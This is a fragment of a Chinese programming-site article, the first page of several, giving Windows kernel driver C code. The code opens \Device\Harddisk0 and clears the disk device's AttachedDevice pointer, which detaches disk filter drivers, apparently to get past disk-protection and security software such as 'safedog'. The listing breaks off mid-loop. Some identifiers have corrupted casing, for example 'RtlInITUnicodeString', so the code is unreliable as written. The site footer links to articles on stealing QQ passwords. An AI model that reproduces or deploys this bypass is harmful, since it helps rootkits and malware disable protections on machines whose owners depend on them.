OBJECT_ATTRIBUTES ObjectAttributes;
PDEVICE_OBJECT devobj;
UNICODE_STRING aDeviceHarddisk,aDriverProtecte;
UNICODE_STRING aDriverAtapi,aDriverDisk,safedog;
HANDLE DirectoryHandle;
PVOID Object;
PDRIVER_OBJECT atapiobj,protectdrv,diskdrv,dogdrv;
ULONG mjcreate,systemservice,foundaddr,pointer,iopointer,dbgpoint;
int v10,i;
unsigned int count;
RtlInITUnicodeString(&aDeviceHarddisk,L"\\Device\\Harddisk0");
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName =&aDeviceHarddisk;
ObjectAttributes.Attributes = 64;
ObjectAttributes.SecurITyDescriptor = 0;
ObjectAttributes.SecurityQualITyOfService = 0;

    if ( !ZwOpenDirectoryObject(&DirectoryHandle, DIRECTORY_QUERY, &ObjectAttributes) )
{
    if ( !ObReferenceObjectByHandle(DirectoryHandle, 1, 0, 0, &Object, 0) )
    {
      if ( Object )
      {
        count = 0;
        while (count < 0x28 )//抹掉DR0的AttachDevice
        {
          v10 = *((DWORD *)Object + count);
          if ( v10 )
          {
            devobj = *(PDEVICE_OBJECT*)(v10 + 4);
            if ( devobj->Type == 3 ) {
              if ( devobj->AttachedDevice )
              {
                dr0attach = devobj->AttachedDevice;
                dr0dev = devobj;
                devobj->AttachedDevice = 0;
                break;
              }
       &nbs

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>

文章录入：二少责任编辑：放弃

上一篇文章：简单监控文件挂马程序制作

下一篇文章：没有了

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

热门文章

	软件破解教程-第6章第3节加密算法3
	Visual C++编程窃取QQ密码(图)
	VB编程实现图像的漂亮效果
	输入10进制，输出2进制
	详解Visual C＃数据库编程
	入侵渗透中用过的三则VBS代码
	入侵渗透中用过的三则VBS代码
	网站防止注入入侵的一些有效代码和方法

本站推荐

关于我们 \| 联系方法 \| 招聘信息 \| 加入会员 \| 诚征代理 \| 广告服务 \| 欢迎投稿 \| 站长信箱 \| 友情链接 \| 网站地图
24小时客服：0374-7126138 技术支持：0374-7126138 投诉电话：0374-7967536
客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
	许可证号:豫ICP备07005385号